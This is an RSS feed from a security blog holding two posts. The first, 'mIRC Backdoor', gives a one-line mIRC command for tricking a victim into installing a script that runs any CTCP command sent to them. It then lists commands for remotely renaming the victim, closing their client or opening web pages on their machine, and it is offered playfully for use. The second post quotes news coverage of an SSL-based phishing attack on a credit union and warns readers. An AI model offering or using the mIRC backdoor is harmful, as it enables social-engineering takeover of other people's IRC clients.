<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Darknet - The Darkside &#187; online-scams</title>
	<atom:link href="http://www.darknet.org.uk/tag/online-scams/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.darknet.org.uk</link>
	<description>Ethical Hacking, Penetration Testing &#38; Computer Security</description>
	<lastBuildDate>Tue, 07 Feb 2012 18:34:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>mIRC Backdoor</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/</link>
		<comments>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comments</comments>
		<pubDate>Fri, 24 Feb 2006 22:16:46 +0000</pubDate>
		<dc:creator>backbone</dc:creator>
				<category><![CDATA[General Hacking]]></category>
		<category><![CDATA[backbone]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[mIRC]]></category>
		<category><![CDATA[online-scams]]></category>
		<category><![CDATA[trojans]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/</guid>
		<description><![CDATA[Well it&#8217;s not really a backdoor&#8230; but we can consider it one&#8230; Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC&#8230; all this backdoor stuff was really nothing more than a mIRC script that by it&#8217;s mean made the client to respond at any command received via [...]]]></description>
			<content:encoded><![CDATA[<p></p>
<p>Well it&#8217;s not really a backdoor&#8230; but we can consider it one&#8230;</p>
<p>Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC&#8230; all this backdoor stuff was really nothing more than a mIRC script that by it&#8217;s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command&#8230; such as ping, version, time, etc&#8230;. so here is the command that the victim has to enter:</p>
<blockquote><p>//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll</p>
</blockquote>
<p>The command is splited in 2 parts, delimited by | (a vertical line)&#8230; So the first section writes a file &#8220;mirc.dll&#8221; in which we write a simple mIRC script which listens to any CTCP request&#8230; the second one loads the file with the mIRC script&#8230;.</p>
<p>After the &#8220;victim&#8221; executes this command we can control it by introducing one of the following lines:</p>
<blockquote><p>{ this is a comment }</p>
<p>/ctcp victims_nick /.nick lamer  { changes the nickname of the victim to lamer }</p>
<p>/ctcp victims_nick /.exit { closes the victims mIRC }</p>
<p>/ctcp victims_nick /.run www.black2white.as.ro<br />
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }</p>
</p>
<p>/ctcp victims_nick /.any_valid_irc_command</p>
</blockquote>
<p>So happy &#8220;masterminding&#8221;&#8230;.</p>
<p></p>
<p>More IRC Commands: <a href="http://www.hackthissite.org/pages/irc/reference.php">http://www.hackthissite.org/pages/irc/reference.php</a></p>
<div class="tweetthis" style="text-align:left;"><p> <a class="tt" href="http://twitter.com/intent/tweet?text=mIRC+Backdoor+http%3A%2F%2Fdarknet.org.uk%2F%3Fp%3D71+from+%40THEdarknet" title="Post to Twitter"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/twitter/tt-twitter-micro3.png" alt="Post to Twitter" /></a> <a class="tt" href="http://www.facebook.com/share.php?u=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;t=mIRC+Backdoor" title="Post to Facebook"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/facebook/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a class="tt" href="http://www.google.com/buzz/post?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;imageurl=" title="Post to Google Buzz"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/gbuzz/tt-gbuzz-micro3.png" alt="Post to Google Buzz" /></a> <a class="tt" href="http://delicious.com/post?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to Delicious"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/delicious/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a class="tt" href="http://digg.com/submit?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to Digg"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/digg/tt-digg-micro3.png" alt="Post to Digg" /></a> <a class="tt" href="http://reddit.com/submit?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to Reddit"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/reddit/tt-reddit-micro3.png" alt="Post to Reddit" /></a> <a class="tt" href="http://stumbleupon.com/submit?url=http://www.darknet.org.uk/2006/02/mirc-backdoor/&amp;title=mIRC+Backdoor" title="Post to StumbleUpon"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/su/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p></div><div class="AWD_like_button "><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.darknet.org.uk%2F2006%2F02%2Fmirc-backdoor%2F&amp;send=false&amp;layout=standard&amp;width=&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:px; height:40px;" allowTransparency="true"></iframe></div>]]></content:encoded>
			<wfw:commentRss>http://www.darknet.org.uk/2006/02/mirc-backdoor/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Phishing Sites Getting More Advanced with SSL</title>
		<link>http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/</link>
		<comments>http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/#comments</comments>
		<pubDate>Wed, 22 Feb 2006 09:49:59 +0000</pubDate>
		<dc:creator>Darknet</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[fake-websites]]></category>
		<category><![CDATA[online-scams]]></category>
		<category><![CDATA[scams]]></category>

		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/</guid>
		<description><![CDATA[Phishing is a difficult enough form of fraud to avoid for most computer users, but when some of the biggest names in the financial industry fail to do their part to detect and eliminate these online scams, consumers often are placed in an untenable situation. Case in point: A source recently forwarded a link to [...]]]></description>
			<content:encoded><![CDATA[<p></p>
<blockquote><p>Phishing is a difficult enough form of fraud to avoid for most computer users, but when some of the biggest names in the financial industry fail to do their part to detect and eliminate these online scams, consumers often are placed in an untenable situation.</p>
<p>Case in point: A source recently forwarded a link to one of the &#8220;best&#8221; phishing attacks I&#8217;ve ever seen. This one &#8212; targeting the tiny Mountain America credit union in Salt Lake City, Utah &#8212; arrives in an HTML-based e-mail telling recipients that their Mountain America credit union card was automatically enrolled in the Verified by Visa program, a legitimate security program offered by Visa that is supposed to provide &#8220;reassurance that only you can use your Visa card online.&#8221;</p>
<p>The fake MountainAmerica.net Web site</p>
<p>The e-mail includes the first five digits of the &#8220;enrolled card,&#8221; but those five digits are found on all Mountain America bank cards, so that portion of the scam is likely to be highly convincing for some recipients. The message directs readers to click on a link and activate their new Verified by Visa membership. </p></blockquote>
<p>Beware, make sure your non tech-savvy friends &#038; relatives are aware of how tricky these scammers are getting.</p>
<p>Someone <strong>YOU</strong> know could be falling for this soon.</p>
<p></p>
<p>Sources: <a href="http://it.slashdot.org/article.pl?sid=06/02/13/2143251&#038;from=rss">Slashdot</a> &#8211; <a href="http://blog.washingtonpost.com/securityfix/2006/02/the_new_face_of_phishing_1.html">Washington Post</a></p>
<div class="tweetthis" style="text-align:left;"><p> <a class="tt" href="http://twitter.com/intent/tweet?text=Phishing+Sites+Getting+More+Advanced+with+SSL+http%3A%2F%2Fdarknet.org.uk%2F%3Fp%3D31+from+%40THEdarknet" title="Post to Twitter"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/twitter/tt-twitter-micro3.png" alt="Post to Twitter" /></a> <a class="tt" href="http://www.facebook.com/share.php?u=http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/&amp;t=Phishing+Sites+Getting+More+Advanced+with+SSL" title="Post to Facebook"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/facebook/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a class="tt" href="http://www.google.com/buzz/post?url=http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/&amp;imageurl=" title="Post to Google Buzz"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/gbuzz/tt-gbuzz-micro3.png" alt="Post to Google Buzz" /></a> <a class="tt" href="http://delicious.com/post?url=http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/&amp;title=Phishing+Sites+Getting+More+Advanced+with+SSL" title="Post to Delicious"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/delicious/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a class="tt" href="http://digg.com/submit?url=http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/&amp;title=Phishing+Sites+Getting+More+Advanced+with+SSL" title="Post to Digg"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/digg/tt-digg-micro3.png" alt="Post to Digg" /></a> <a class="tt" href="http://reddit.com/submit?url=http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/&amp;title=Phishing+Sites+Getting+More+Advanced+with+SSL" title="Post to Reddit"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/reddit/tt-reddit-micro3.png" alt="Post to Reddit" /></a> <a class="tt" href="http://stumbleupon.com/submit?url=http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/&amp;title=Phishing+Sites+Getting+More+Advanced+with+SSL" title="Post to StumbleUpon"><img class="nothumb" src="http://www.darknet.org.uk/wp-content/plugins/tweet-this/icons/en/su/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p></div><div class="AWD_like_button "><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.darknet.org.uk%2F2006%2F02%2Fphishing-sites-getting-more-advanced-with-ssl%2F&amp;send=false&amp;layout=standard&amp;width=&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:px; height:40px;" allowTransparency="true"></iframe></div>]]></content:encoded>
			<wfw:commentRss>http://www.darknet.org.uk/2006/02/phishing-sites-getting-more-advanced-with-ssl/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>

